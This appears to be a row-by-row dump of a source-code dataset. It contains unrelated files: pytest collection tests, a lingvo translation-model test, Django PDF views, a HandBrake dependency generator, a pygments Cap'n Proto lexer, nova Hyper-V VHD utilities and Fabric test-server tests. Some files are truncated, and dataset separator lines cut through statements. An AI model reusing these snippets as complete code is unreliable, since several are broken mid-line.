# arguments collects the tests in that directory normally
for dirname in ('env', 'gui', 'uts'):
monkeypatch.chdir(testdir.tmpdir.join(dirname))
items, reprec = testdir.inline_genitems()
assert [x.name for x in items] == ['test_%s' % dirname]
class TestCollectPluginHookRelay:
def test_pytest_collect_file(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_file(self, path, parent):
if not path.basename.startswith("."):
# Ignore hidden files, e.g. .testmondata.
wascalled.append(path)
testdir.makefile(".abc", "xyz")
pytest.main([testdir.tmpdir], plugins=[Plugin()])
assert len(wascalled) == 1
assert wascalled[0].ext == '.abc'
def test_pytest_collect_directory(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_directory(self, path, parent):
wascalled.append(path.basename)
testdir.mkdir("hello")
testdir.mkdir("world")
pytest.main(testdir.tmpdir, plugins=[Plugin()])
assert "hello" in wascalled
assert "world" in wascalled
class TestPrunetraceback:
def test_custom_repr_failure(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_collect_file(path, parent):
return MyFile(path, parent)
class MyError(Exception):
pass
class MyFile(pytest.File):
def collect(self):
raise MyError()
def repr_failure(self, excinfo):
if excinfo.errisinstance(MyError):
return "hello world"
return pytest.File.repr_failure(self, excinfo)
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*hello world*",
])
@pytest.mark.xfail(reason="other mechanism for adding to reporting needed")
def test_collect_report_postprocessing(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_make_collect_report(__multicall__):
rep = __multicall__.execute()
rep.headerlines += ["header1"]
return rep
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*header1*",
])
class TestCustomConftests:
def test_ignore_collect_path(self, testdir):
testdir.makeconftest("""
def pytest_ignore_collect(path, config):
return path.basename.startswith("x") or \
path.basename == "test_one.py"
""")
su
|
tensorflow/lingvo
|
lingvo/tasks/mt/model_test.py
|
Python
|
apache-2.0
| 35,425 | 0.011066 |
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MT Models."""
import lingvo.compat as tf
from lingvo.core import base_input_generator
from lingvo.core import base_layer
from lingvo.core import cluster_factory
from lingvo.core import layers
from lingvo.core import optimizer
from lingvo.core import py_utils
from lingvo.core import schedule
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.tasks.mt import decoder
from lingvo.tasks.mt import encoder
from lingvo.tasks.mt import input_generator
from lingvo.tasks.mt import model
import numpy as np
FLAGS = tf.flags.FLAGS
_TF_RANDOM_SEED = 93820986
class TestInputGenerator(base_input_generator.BaseSequenceInputGenerator):
@classmethod
def Params(cls):
p = super().Params()
p.Define('split', True, '')
return p
def __init__(self, params):
super().__init__(params)
self._step = 0
def InfeedBatchSize(self):
if self.params.split:
return 10 / 2
return 10
def _InputBatch(self):
np.random.seed(1)
bs, sl = 10, 7
src_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_labels = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_weights = tf.constant(np.ones(shape=[bs, sl], dtype=np.float32))
src_paddings = tf.zeros([bs, sl])
tgt_paddings = tf.zeros([bs, sl])
ret = py_utils.NestedMap()
ret.src = py_utils.NestedMap()
ret.tgt = py_utils.NestedMap()
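    # When 'split' is enabled the batch is cut in half and tf.cond feeds
    # alternating halves on even/odd global steps; otherwise the full batch
    # is returned unchanged.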
if self.params.split:
src_ids = tf.split(src_ids, 2, 0)
|
src_paddings = tf.split(src_paddings, 2, 0)
tgt_ids = tf.split
|
(tgt_ids, 2, 0)
tgt_labels = tf.split(tgt_labels, 2, 0)
tgt_paddings = tf.split(tgt_paddings, 2, 0)
tgt_weights = tf.split(tgt_weights, 2, 0)
ret.src.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_ids[0], lambda: src_ids[1])
ret.src.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_paddings[0], lambda: src_paddings[1])
ret.tgt.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_ids[0], lambda: tgt_ids[1])
ret.tgt.labels = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_labels[0], lambda: tgt_labels[1])
ret.tgt.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_paddings[0], lambda: tgt_paddings[1])
ret.tgt.weights = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_weights[0], lambda: tgt_weights[1])
else:
ret.src.ids = src_ids
ret.src.paddings = src_paddings
ret.tgt.ids = tgt_ids
ret.tgt.labels = tgt_labels
ret.tgt.paddings = tgt_paddings
ret.tgt.weights = tgt_weights
return ret
class TransformerModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.TransformerEncoder.Params()
p.name = 'encoder'
p.random_seed = 1234
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.transformer_stack.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
p.transformer_stack.transformer_tpl.tr_fflayer_tpl.hidden_dim = 5
return p
def _DecoderParams(self):
p = decoder.TransformerDecoder.Params()
p.name = 'decoder'
p.random_seed = 1234
p.source_dim = 4
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.trans_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.num_attention_heads = 2
p.trans_tpl.tr_fflayer_tpl.input_dim = 4
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 8
p.softmax.num_shards = 1
p.target_seq_len = 5
return p
def _testParams(self):
p = model.TransformerModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 2e-4
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
print('vars = ', mdl.vars)
flatten_vars = mdl.vars.Flatten()
print('vars flattened = ', flatten_vars)
self.assertEqual(len(flatten_vars), 238)
# Should match tf.trainable_variables().
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self, dtype=tf.float32, fprop_dtype=tf.float32):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.dtype = dtype
if fprop_dtype:
p.fprop_dtype = fprop_dtype
p.input.dtype = fprop_dtype
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.99771, 10.377038], [243.92978, 10.379991],
[260.7751, 10.379107], [201.10846, 10.379791],
[272.22006, 10.370288]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = ', vals)
self.assertAllClose(vals, [(226.99771, 10.377038), (243.92978, 10.379991),
(260.7751, 10.379107), (201.10846, 10.379791),
(272.22006, 10.370288)])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('BProp
|
CallmeTorre/Idalia
|
ESCOM/ConsultarDocumento/views.py
|
Python
|
apache-2.0
| 2,955 | 0.012864 |
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.views.generic import View
from django.http import HttpResponse
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units
|
import inch
from reportlab.platypus import (Flowable, Paragraph,
Simp
|
leDocTemplate, Spacer)
from .models import TablaSolicitud
from .models import Bitacora
from .models import TablaAlumno
# Create your views here.
class ConsultarDocumento(View):
template_name = "consultarDocumento.html"
def get(self, request):
return render(
request,
self.template_name,
)
class VerDocumento(View):
template_name = "verDocumento.html"
model = TablaAlumno
model2 = TablaSolicitud
def get(self, request, folio):
self.request.session['errorConsulta'] = None
print(folio)
context = dict()
try:
alumn=self.model.objects.get(codigo = folio)
except:
self.request.session['errorConsulta'] = "Es incorrecto el código insertado"
return redirect('consultar')
context['solicitudes'] = self.model2.objects.filter(alumno_id=alumn.id)
return render(
request,
self.template_name,
context
)
class VerPdf(View):
template_name = "verPdf.html"
model = TablaSolicitud
model2 = TablaAlumno
def get(self, request, id, solicitudId):
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="Documento.pdf"'
p = canvas.Canvas(response)
alumno = self.model2.objects.get(codigo=id)
bitacora = self.model.objects.get(id = solicitudId)
        # drawCentredString(x, y, text): coordinates are in points,
        # measured from the bottom-left corner of the page
p.setFont("Helvetica", 16)
p.drawCentredString(260,800,"INSTITUTO POLITECNICO NACIONAL")
p.drawCentredString(260,770,"ESCUELA SUPERIOR DE COMPUTO")
p.drawCentredString(280,740,"SUBDIRECCION DE SERVIVIOS EDUCATIVOS E INTEGRACION SOCIAL")
p.line(120,700,580,700)
p.setFont("Helvetica", 12)
p.drawCentredString(260,715,"DEPARTAMENTO DE GESTION ESCOLAR")
p.drawCentredString(260,700,str(bitacora.documento))
p.drawCentredString(100,695,"A QUIEN CORRESPONDA:")
p.drawCentredString(100,670,"HACE CONSTAR QUE EL ALUMNO")
p.drawCentredString(260,650,str(bitacora.alumno))
p.drawCentredString(100,630,"CON NUMERO DE BOLETA")
p.drawCentredString(230,630,str(bitacora.alumno.boleta))
p.drawCentredString(380,630,"ESTA INSCRITO EN ESTE PLANTEL");
p.drawCentredString(200, 600, str(bitacora.fecha))
p.drawCentredString(200, 610, str(bitacora.estado))
p.drawCentredString(200, 620, str(bitacora.folio))
p.showPage()
p.save()
return response
|
utensil-star/HandBrake
|
gtk/src/makedeps.py
|
Python
|
gpl-2.0
| 5,589 | 0.004831 |
#! /usr/bin/python
import collections
import sys
import json
DepEntry = collections.namedtuple('DepEntry', 'widget dep enable die hide')
dep_map = (
DepEntry("title", "queue_add", "none", True, False),
DepEntry("title", "queue_add_menu", "none", True, False),
DepEntry("title", "queue_add_multiple_menu", "none", True, False),
DepEntry("title", "preview_frame", "none", True, False),
DepEntry("title", "picture_summary", "none", True, False),
DepEntry("title", "picture_summary2", "none", True, False),
DepEntry("title", "chapters_tab", "none", True, False),
DepEntry("title", "start_point", "none", True, False),
DepEntry("title", "end_point", "none", True, False),
DepEntry("title", "angle", "none", True, False),
DepEntry("title", "angle_label", "1", True, False),
DepEntry("use_dvdnav", "angle", "0", True, True),
DepEntry("use_dvdnav", "angle_label", "0", True, True),
DepEntry("angle_count", "angle", "1", True, True),
DepEntry("angle_count", "angle_label", "1", True, True),
DepEntry("vquality_type_bitrate", "VideoAvgBitrate", "1", False, False),
DepEntry("vquality_type_constant", "VideoQualitySlider", "1", False, False),
DepEntry("vquality_type_constant", "VideoTwoPass", "1", True, False),
DepEntry("vquality_type_constant", "VideoTurboTwoPass", "1", True, False),
DepEntry("VideoFramerate", "VideoFrameratePFR", "source", True, True),
DepEntry("VideoFramerate", "VideoFramerateVFR", "source", False, True),
DepEntry("VideoTwoPass", "VideoTurboTwoPass", "1", False, False),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlace", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceCustom", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceLabel", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecomb", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombCustom", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombLabel", "0", True, True),
DepEntry("PictureDeinterlace", "PictureDeinterlaceCustom", "custom", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePreset", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePresetLabel", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTune", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTuneLabel", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseCustom", "off", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseCustom", "custom", False, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTune", "custom", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTuneLabel", "custom", True, True),
DepEntry("PictureDecomb", "PictureDecombCustom", "custom", False, True),
DepEntry("PictureDetelecine", "PictureDetelecineCustom", "custom", False, True),
DepEntry("PictureWidthEnable", "PictureWidth", "1", False, False),
DepEntry("PictureHeightEnable", "PictureHeight", "1", False, False),
DepEntry("PictureAutoCrop", "PictureTopCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureBottomCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureLeftCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureRightCrop", "0", False, False),
DepEntry("x264_bframes", "x264_bpyramid", "<2", True, False),
DepEntry("x264_bframes", "x264_direct", "0", True, False),
DepEntry("x264_bframes", "x264_b_adapt", "0", True, False),
DepEntry("x264_subme", "x264_psy_rd", "<6", True, False),
DepEntry("x264_subme", "x264_psy_trell", "<6", True, False),
DepEntry("x264_trellis", "x264_psy_trell", "0", True, False),
DepEntry("VideoEncoder", "x264FastDecode", "x264", False, True),
DepEntry("VideoEncoder", "x264UseAdvancedOptions", "x264", False, True),
DepEntry("HideAdvancedVideoSettings", "x264UseAdvancedOptions", "1", True, True),
DepEntry("VideoEncoder", "VideoOptionExtraWindow", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("VideoEncoder", "VideoOptionExtraLabel", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("x264UseAdvancedOptions", "VideoSettingsTable", "1", True, False),
DepEntry("VideoEncoder", "x264_box", "x264", False, True),
DepEntry("x264UseAdvancedOptions", "x264_box", "0", True, False),
DepEntry("auto_name", "autoname_box", "1", False, False),
)
def main():
try:
depsfile = open("widget.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err) )
sys.exit(1)
try:
revfile = open("widget_reverse.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err))
sys.exit(1)
|
top = dict()
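    # Forward map (widget.deps): each entry's 'widget' -> list of its 'dep'
    # values.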
for ii in dep_map:
if ii.widget in top:
|
continue
deps = list()
for jj in dep_map:
if jj.widget == ii.widget:
deps.append(jj.dep)
top[ii.widget] = deps
json.dump(top, depsfile, indent=4)
top = dict()
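    # Reverse map (widget_reverse.deps): each distinct 'dep' -> list of
    # [widget, enable, die, hide] records taken from the matching entries.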
for ii in dep_map:
if ii.dep in top:
continue
deps = list()
for jj in dep_map:
if ii.dep == jj.dep:
rec = list()
rec.append(jj.widget)
rec.append(jj.enable)
rec.append(jj.die)
rec.append(jj.hide)
deps.append(rec)
top[ii.dep] = deps
json.dump(top, revfile, indent=4)
main()
|
sernst/RefinedStatistics
|
measurement_stats/test/test_value2D.py
|
Python
|
mit
| 2,275 | 0.002198 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import math
import random
import unittest
from measurement_stats import angle
|
from measurement_stats import value
from measu
|
rement_stats import value2D
HALF_SQRT_2 = 0.5 * math.sqrt(2.0)
HALF_SQRT_3 = 0.5 * math.sqrt(3.0)
class TestValue2D(unittest.TestCase):
def test_angleBetween(self):
p1 = value2D.Point2D(
value.ValueUncertainty(2.0, 0.1),
value.ValueUncertainty(0.0, 0.1) )
p2 = value2D.Point2D(
value.ValueUncertainty(0.0, 0.1),
value.ValueUncertainty(2.0, 0.1) )
a = p1.angle_between(p2)
self.assertAlmostEquals(a.degrees, 90.0, 1)
def test_rotate(self):
tests = [
(90.0, 0.0, 1.0), (-90.0, 0.0, -1.0),
(180.0, -1.0, 0.0), (-180.0, -1.0, 0.0),
(270.0, 0.0, -1.0), (-270.0, 0.0, 1.0),
(360.0, 1.0, 0.0), (-360.0, 1.0, 0.0),
(45.0, HALF_SQRT_2, HALF_SQRT_2),
(-45.0, HALF_SQRT_2, -HALF_SQRT_2),
(315.0, HALF_SQRT_2, -HALF_SQRT_2),
(-315.0, HALF_SQRT_2, HALF_SQRT_2),
(30.0, HALF_SQRT_3, 0.5), (-30.0, HALF_SQRT_3, -0.5),
(330.0, HALF_SQRT_3, -0.5), (-330.0, HALF_SQRT_3, 0.5) ]
for test in tests:
radius = random.uniform(0.001, 1000.0)
p = value2D.Point2D(
value.ValueUncertainty(radius, 0.25),
value.ValueUncertainty(0.0, 0.25) )
p.rotate(angle.Angle(degrees=test[0]))
self.assertAlmostEqual(p.x.raw, radius * test[1], 2)
self.assertAlmostEqual(p.y.raw, radius * test[2], 2)
def test_projection(self):
"""
:return:
"""
line_start = value2D.create_point(0, 0)
line_end = value2D.create_point(1, 1)
point = value2D.create_point(0, 1)
result = value2D.closest_point_on_line(point, line_start, line_end)
self.assertIsNotNone(result)
print('PROJECTION:', result)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestValue2D)
unittest.TextTestRunner(verbosity=2).run(suite)
|
wakatime/wakatime
|
wakatime/packages/py27/pygments/lexers/capnproto.py
|
Python
|
bsd-3-clause
| 2,194 | 0 |
# -*- coding: utf-8 -*-
"""
pygments.lexers.capnproto
~~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Cap'n Proto schema language.
:copyright: Copyright 2006-2019 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default
from pygments.token import Text, Comment, Keyword, Name, Literal
__all__ = ['CapnProtoLexer']
class CapnProtoLexer(RegexLexer):
"""
For `Cap'n Proto <https://capnproto.org>`_ source.
.. versionadded:: 2.2
"""
name = 'Cap\'n Proto'
filenames = ['*.capnp']
aliases = ['capnp']
flags = re.MULTILINE | re.UNICODE
tokens = {
'root': [
(r'#.*?$', Comment.Single),
(r'@[0-9a-zA-Z]*', Name.Decorator),
(r'=', Literal, 'expression'),
(r':', Name.Class, 'type'),
(r'\$', Name.Attribute, 'annotation'),
(r'(struct|enum|interface|union|import|using|const|annotation|'
r'extends|in|of|on|as|with|from|fixed)\b',
Keyword),
(r'[\w.]+', Name),
(r'[^#@=:$\w]+', Text),
],
'type': [
(r'[^][=;,(){}$]+', Name.Class),
(r'[\[(]', Name.Class, 'parentype'),
default('#pop'),
],
'parentype': [
(r'[^][;()]+', Name.Class),
(r'[\[(]', Name.Class, '#push'),
(r'[])]', Name.Class, '#pop'),
default('#pop'),
],
'expression': [
(r'[^][;,(){}$]+', Literal),
(r'[\[(]', Literal, 'pa
|
renexp'),
default('#pop'),
],
'parenexp': [
(r'[^][;()]+', Literal),
(r'[\[(]', Literal, '#push'),
(r'[])
|
]', Literal, '#pop'),
default('#pop'),
],
'annotation': [
(r'[^][;,(){}=:]+', Name.Attribute),
(r'[\[(]', Name.Attribute, 'annexp'),
default('#pop'),
],
'annexp': [
(r'[^][;()]+', Name.Attribute),
(r'[\[(]', Name.Attribute, '#push'),
(r'[])]', Name.Attribute, '#pop'),
default('#pop'),
],
}
|
ntt-sic/nova
|
nova/virt/hyperv/vhdutils.py
|
Python
|
apache-2.0
| 7,795 | 0.000257 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VHD related operations.
Official VHD format specs can be retrieved at:
http://technet.microsoft.com/en-us/library/bb676673.aspx
See "Download the Specifications Without Registering"
Official VHDX format specs can be retrieved at:
http://www.microsoft.com/en-us/download/details.aspx?id=34750
"""
import struct
import sys
if sys.platform == 'win32':
import wmi
from nova.openstack.common.gettextutils import _
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
from xml.etree import ElementTree
VHD_HEADER_SIZE_FIX = 512
VHD_BAT_ENTRY_SIZE = 4
VHD_DYNAMIC_DISK_HEADER_SIZE = 1024
VHD_HEADER_SIZE_DYNAMIC = 512
VHD_FOOTER_SIZE_DYNAMIC = 512
VHD_BLK_SIZE_OFFSET = 544
VHD_SIGNATURE = 'conectix'
VHDX_SIGNATURE = 'vhdxfile'
class VHDUtils(object):
def __init__(self):
self._vmutils = vmutils.VMUtils()
if sys.platform == 'win32':
self._conn = wmi.WMI(moniker='//./root/virtualization')
def validate_vhd(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ValidateVirtualHardDisk(
Path=vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def create_dynamic_vhd(self, path, max_internal_size, format):
if format != constants.DISK_FORMAT_VHD:
raise vmutils.HyperVException(_("Unsupported disk format: %s") %
format)
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDynamicVirtualHardDisk(
Path=path, MaxInternalSize=max_internal_size)
self._vmutils.check_ret_val(ret_val, job_path)
def create_differencing_vhd(self, path, parent_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDifferencingVirtualHardDisk(
Path=path, ParentPath=parent_path)
self._vmutils.check_ret_val(ret_val, job_path)
def reconnect_parent_vhd(self, child_vhd_path, parent_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ReconnectParentVirtualHardDisk(
ChildPath=child_vhd_path,
ParentPath=parent_vhd_path,
Force=True)
self._vmutils.check_ret_val(ret_val, job_path)
def merge_vhd(self, src_vhd_path, dest_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.MergeVirtualHardDisk(
SourcePath=src_vhd_path,
DestinationPath=dest_vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def resize_vhd(self, vhd_path, new_max_size, is_file_max_size=True):
if is_file_max_size:
new_internal_max_size = self.get_internal_vhd_size_by_file_size(
vhd_path, new_max_size)
else:
new_internal_max_size = new_max_size
image_man_svc = self._conn.Msvm_ImageManagem
|
entService()[0]
(job_path, ret_val) = image_man_svc.ExpandVirtualHardDisk(
Path=vhd_path, MaxInternalSize=new_internal_max_size)
self._vmutils.check_ret_val(ret
|
_val, job_path)
def get_internal_vhd_size_by_file_size(self, vhd_path, new_vhd_file_size):
"""Fixed VHD size = Data Block size + 512 bytes
Dynamic_VHD_size = Dynamic Disk Header
+ Copy of hard disk footer
+ Hard Disk Footer
+ Data Block
+ BAT
Dynamic Disk header fields
Copy of hard disk footer (512 bytes)
Dynamic Disk Header (1024 bytes)
BAT (Block Allocation table)
Data Block 1
Data Block 2
Data Block n
Hard Disk Footer (512 bytes)
        Default block size is 2 MiB
        BAT entry size is 4 bytes
"""
base_vhd_info = self.get_vhd_info(vhd_path)
vhd_type = base_vhd_info['Type']
if vhd_type == constants.VHD_TYPE_FIXED:
vhd_header_size = VHD_HEADER_SIZE_FIX
return new_vhd_file_size - vhd_header_size
elif vhd_type == constants.VHD_TYPE_DYNAMIC:
bs = self._get_vhd_dynamic_blk_size(vhd_path)
bes = VHD_BAT_ENTRY_SIZE
ddhs = VHD_DYNAMIC_DISK_HEADER_SIZE
hs = VHD_HEADER_SIZE_DYNAMIC
fs = VHD_FOOTER_SIZE_DYNAMIC
max_internal_size = (new_vhd_file_size -
(hs + ddhs + fs)) * bs / (bes + bs)
return max_internal_size
else:
raise vmutils.HyperVException(_("The %(vhd_type)s type VHD "
"is not supported") %
{"vhd_type": vhd_type})
def _get_vhd_dynamic_blk_size(self, vhd_path):
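        # The block size is a 4-byte big-endian integer stored 32 bytes into
        # the dynamic disk header, i.e. at absolute offset 544 (after the
        # 512-byte copy of the footer).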
blk_size_offset = VHD_BLK_SIZE_OFFSET
try:
with open(vhd_path, "rb") as f:
f.seek(blk_size_offset)
version = f.read(4)
except IOError:
raise vmutils.HyperVException(_("Unable to obtain block size from"
" VHD %(vhd_path)s") %
{"vhd_path": vhd_path})
return struct.unpack('>i', version)[0]
def get_vhd_parent_path(self, vhd_path):
return self.get_vhd_info(vhd_path).get("ParentPath")
def get_vhd_info(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(vhd_info,
job_path,
ret_val) = image_man_svc.GetVirtualHardDiskInfo(vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
vhd_info_dict = {}
et = ElementTree.fromstring(vhd_info)
for item in et.findall("PROPERTY"):
name = item.attrib["NAME"]
value_text = item.find("VALUE").text
if name == "ParentPath":
vhd_info_dict[name] = value_text
elif name in ["FileSize", "MaxInternalSize"]:
vhd_info_dict[name] = long(value_text)
elif name in ["InSavedState", "InUse"]:
vhd_info_dict[name] = bool(value_text)
elif name == "Type":
vhd_info_dict[name] = int(value_text)
return vhd_info_dict
def get_vhd_format(self, path):
with open(path, 'rb') as f:
# Read header
if f.read(8) == VHDX_SIGNATURE:
return constants.DISK_FORMAT_VHDX
# Read footer
f.seek(0, 2)
file_size = f.tell()
if file_size >= 512:
f.seek(-512, 2)
if f.read(8) == VHD_SIGNATURE:
return constants.DISK_FORMAT_VHD
raise vmutils.HyperVException(_('Unsupported virtual disk format'))
def get_best_supported_vhd_format(self):
return constants.DISK_FORMAT_VHD
|
jaraco/fabric
|
tests/test_server.py
|
Python
|
bsd-2-clause
| 2,975 | 0 |
"""
Tests for the test server itself.
Not intended to be run by the greater test suite, only by specifically
targeting it on the command-line. Rationale: not really testing Fabric itself,
no need to pollute Fab's own test suite. (Yes, if these tests fail, it's likely
that the Fabric tests using the test server may also have issues, but still.)
"""
__test__ = False
from nose.tools import eq_, ok_
from fabric.network import ssh
from server import FakeSFTPServer
class AttrHolder(object):
pass
def test_list_folder():
for desc, file_map, arg, expected in (
(
"Single file",
{'file.txt': 'contents'},
'',
['file.txt']
),
(
"Single absolute file",
{'/file.txt': 'contents'},
'/',
|
['file.txt']
),
(
"Multiple files",
{'file1.txt': 'contents', 'file2.txt': 'contents2'},
'',
['file1.txt', 'file2.txt']
),
(
"Single empty folder",
|
{'folder': None},
'',
['folder']
),
(
"Empty subfolders",
{'folder': None, 'folder/subfolder': None},
'',
['folder']
),
(
"Non-empty sub-subfolder",
{'folder/subfolder/subfolder2/file.txt': 'contents'},
"folder/subfolder/subfolder2",
['file.txt']
),
(
"Mixed files, folders empty and non-empty, in homedir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'empty_folder': None
},
'',
['file.txt', 'file2.txt', 'folder', 'empty_folder']
),
(
"Mixed files, folders empty and non-empty, in subdir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'folder/subfolder/file4.txt': 'contents4',
'empty_folder': None
},
"folder",
['file3.txt', 'subfolder']
),
):
# Pass in fake server obj. (Can't easily clean up API to be more
# testable since it's all implementing 'ssh' interface stuff.)
server = AttrHolder()
server.files = file_map
interface = FakeSFTPServer(server)
results = interface.list_folder(arg)
# In this particular suite of tests, all results should be a file list,
# not "no files found"
ok_(results != ssh.SFTP_NO_SUCH_FILE)
# Grab filename from SFTPAttribute objects in result
output = map(lambda x: x.filename, results)
# Yield test generator
